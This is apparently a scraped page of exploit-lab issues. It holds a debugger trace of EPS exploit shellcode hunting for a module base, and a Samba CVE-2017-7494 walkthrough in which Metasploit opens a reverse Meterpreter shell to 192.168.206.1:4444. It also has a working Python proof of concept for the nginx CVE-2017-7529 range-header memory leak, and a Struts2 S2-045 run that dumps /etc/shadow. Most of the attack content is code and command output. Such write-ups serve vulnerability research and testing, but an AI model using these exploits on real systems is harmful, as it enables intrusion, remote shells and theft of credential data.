061e2fae c52d86c52d0e lds ebp,fword ptr ds:[0E2DC586h]
061e2fb4 c529 lds ebp,fword ptr [ecx]
061e2fb6 844521 test byte ptr [ebp+21h],al
061e2fb9 90 nop
061e2fba c50d409c3600 lds ecx,fword ptr ds:[369C40h]
061e2fc0 3980ba04403c cmp dword ptr [eax+3C4004BAh],eax
061e2fc6 023b add bh,byte ptr [ebx]
061e2fc8 803100 xor byte ptr [ecx],0
061e2fcb 3a88409c2680 cmp cl,byte ptr [eax-7FD963C0h]
061e2fd1 29803aef403c sub dword ptr [eax+3C40EF3Ah],eax
061e2fd7 022b add ch,byte ptr [ebx]
061e2fd9 802100 and byte ptr [ecx],0
061e2fdc 3a6b29 cmp ch,byte ptr [ebx+29h]
061e2fdf 7428 je 061e3009 Branch
061e2fe0 2800 sub byte ptr [eax],al
061e2fe1 0000 add byte ptr [eax],al
061e2fe3 00c5 add ch,al
061e2fee 292b sub dword ptr [ebx],ebp
061e2ff0 2b740000 sub esi,dword ptr [eax+eax]
061e2ff4 0080451e92c1 add byte ptr [eax-3E6DE1BBh],al
061e2ffa e301 jecxz 061e2ffd Branch
061e2ffc c1737e5c sal dword ptr [ebx+7Eh],5Ch
061e2ffd 737e jae 061e307d Branch
061e2fff 5c pop esp
061e3000 aa stos byte ptr es:[edi]
061e3001 aa stos byte ptr es:[edi]
061e3002 aa stos byte ptr es:[edi]
061e3003 2afe sub bh,dh
061e3005 99 cdq
061e3006 e424 in al,24h
061e3008 f9 stc
061e3009 d7 xlat byte ptr [ebx]
061e300a c01f33 rcr byte ptr [edi],33h
061e300d 3333 xor esi,dword ptr [ebx]
061e300f 333a xor edi,dword ptr [edx]
061e3011 fb sti
061e3012 c16382c4 shl dword ptr [ebx-7Eh],0C4h
061e3016 3e7ef9 ht jle 061e3012 Branch
061e3019 d7 xlat byte ptr [ebx]
061e301a c01f33 rcr byte ptr [edi],33h
061e301d 3333 xor esi,dword ptr [ebx]
061e301f 333a xor edi,dword ptr [edx]
061e3021 fb sti
061e3022 c17782c4 sal dword ptr [edi-7Eh],0C4h
061e3026 3e7cc5 ht jl 061e2fee Branch
061e3029 22fe and bh,dh
061e302b 45 inc ebp
061e302c 2afc sub bh,ah
061e302e 15682fafad adc eax,0ADAF2F68h
061e3033 64e1aa loope 061e2fe0 Branch
061e3036 45 inc ebp
061e3037 7640 jbe 061e3079 Branch
061e3039 62627f bound esp,qword ptr [edx+7Fh]
061e3079 008023323a28 add byte ptr [eax+283A3223h],al
061e307d 3a28 cmp ch,byte ptr [eax]
061e307f 39b7b1203232 cmp dword ptr [edi+323220B1h],esi
061e3085 b9b2393980 mov ecx,803939B2h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f09 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f09 64a100000000 mov eax,dword ptr fs:[00000000h] fs:003b:00000000=002bc95c
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=002bc95c ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f0f esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f0f 8b4004 mov eax,dword ptr [eax+4] ds:0023:002bc960=63c102c8
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c102c8 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f12 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f12 250000ffff and eax,0FFFF0000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63c10000=8bff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a06
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a06
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63c00000=c63b
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bf0000=0fc0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63be0000=75ff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bd0000=458d
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh ds:0023:63bc0000=8bf0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f1c 7517 jne 061e2f35 [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0 ov up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a16
061e2f35 2d00000100 sub eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bb0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
061e2f3a ebdb jmp 061e2f17
References
- https://www.hybrid-analysis.com/sample/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc?environmentId=100
- http://www.eteamz.com/ginysteams/files/POno46543.docx
- https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf
- https://www.ghostscript.com/
- http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
- https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
- https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
- https://gist.github.com/subTee/54e72458af1c97f02e32
- http://casual-scrutiny.blogspot.jp/2016/02/cve-2015-2545-itw-emet-evasion.html
- https://blogs.msdn.microsoft.com/rihamselim/2012/03/14/breaking-on-module-load/
- https://stackoverflow.com/questions/10759661/manually-setting-breakpoints-in-windbg
- http://bbs.pediy.com/thread-216045.htm
- http://bbs.pediy.com/thread-216046.htm
[CVE-2017-7497] Samba - Remote code execution from a writable share
Bug Flow
-> /path/to/samba-X.X.XX
How to setup a vulnerable ENV ?
add the following contents into /etc/samba/smb.conf
[CVE20177494]
comment = CVE20177494
path = /tmp
public = yes
# available = yes
# browseable = yes
writable = yes
# printable = yes
# guest ok = yes
create mask = 0777
directory mask = 0777
- vulnerable version: samba 4.5.2
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.206.144
RHOSTS => 192.168.206.144
msf auxiliary(smb_enumshares) > run
[+] 192.168.206.144:139 - print$ - (DISK) Printer Drivers
[+] 192.168.206.144:139 - CVE20177494 - (DISK) CVE20177494
[+] 192.168.206.144:139 - IPC$ - (IPC) IPC Service (Samba 4.5.2-Debian)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.206.144
RHOST => 192.168.206.144
msf exploit(is_known_pipename) > set target 0
target => 0
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.206.144 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(is_known_pipename) > run
[*] Started reverse TCP handler on 192.168.206.1:4444
[*] 192.168.206.144:445 - Using location \\192.168.206.144\CVE20177494\ for the path
[*] 192.168.206.144:445 - Hunting for payload using common path names: VZiaULDJ.so - //192.168.206.144/CVE20177494/
[*] 192.168.206.144:445 - Trying location /volume1/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /tmp/VZiaULDJ.so...
[*] Sending stage (797784 bytes) to 192.168.206.144
[*] Meterpreter session 1 opened (192.168.206.1:4444 -> 192.168.206.144:58682) at 2017-05-26 05:52:19 -0500
meterpreter > sysinfo
Computer : sh.localdomain
OS : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter : x86/linux
meterpreter > sysinfo
Computer : sh.localdomain
OS : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 2702 created.
Channel 1 created.
smbd -V
Version 4.5.2-Debian
References
[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability
Description
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import requests
import logging
import sys
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def send_http_request(url, headers={}, timeout=8.0):
httpResponse = requests.get(url, headers=headers, timeout=timeout)
httpHeaders = httpResponse.headers
log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
return httpResponse
def exploit(url):
log.info("target: %s", url)
httpResponse = send_http_request(url)
content_length = httpResponse.headers.get('Content-Length', 0)
bytes_length = int(content_length) + 623
content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
log.info("[+] Vulnerable to CVE-2017-7529")
else:
log.info("[?] Unknown Vulnerable")
if __name__ == '__main__':
if len(sys.argv) != 2:
print("[*] %s <url>" % sys.argv[0])
sys.exit(1)
url = sys.argv[1]
exploit(url)
"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7
HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585
.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
"""
References
Bug at line number 232 when bindata is finally written into file (Windows Environment)
Hi,
First thanks for sharing this PoC.
When we run this code in windows OS to generate the the lnk file it introduces the character '\x0D' before the langth of the name (length will be 10 '\x0A' after including null char at end of name )i.e. "Microsoft" in this case. As name Microsoft is hard coded there it will always do this thing, but if you change the name to any other name whose length is 10 (including null byte) than this problem will persist there.
Reason: As we are writing the final data to the file in simple "write mode" rather than "write in binary mode" so it will write '\x0D\x0A" instead of '\x0A' beacause '\x0A' represents LF which will be replaced by CRLF (i.e. '\x0D\x0A') in windows.
Solution: need to change write mode to binary mode at line number 232. i.e.
with open(lnkpath, 'w') as lnkf:
change to
with open(lnkpath, 'wb') as lnkf:
and problem will be solved.
In Linux there is no problem.
Thanks
p
[Exploit] CVE-2017-5638 : Apache Struts2 S2_045
Add https support - https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py
$ python2.7 test.py https://192.168.1.100/ "cat /etc/shadow"
[+] The target is vulnerable.
[*] struts2-cmd $ cat /etc/shadow
[*] root:$6$nK....9iIdLoX3VzX.U.:17221:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
....
Apache Struts2 S2-048
References
- https://cwiki.apache.org/confluence/display/WW/S2-048
- http://bobao.360.cn/news/detail/4219.html
- http://fisheye.apache.org:8060/browse/struts/apps/showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java?r1=59f4f31a7f3800a540c168abc67b8800db3f2f97&r2=73da12e723c2737bd515946588ddcd898acf584a
- https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.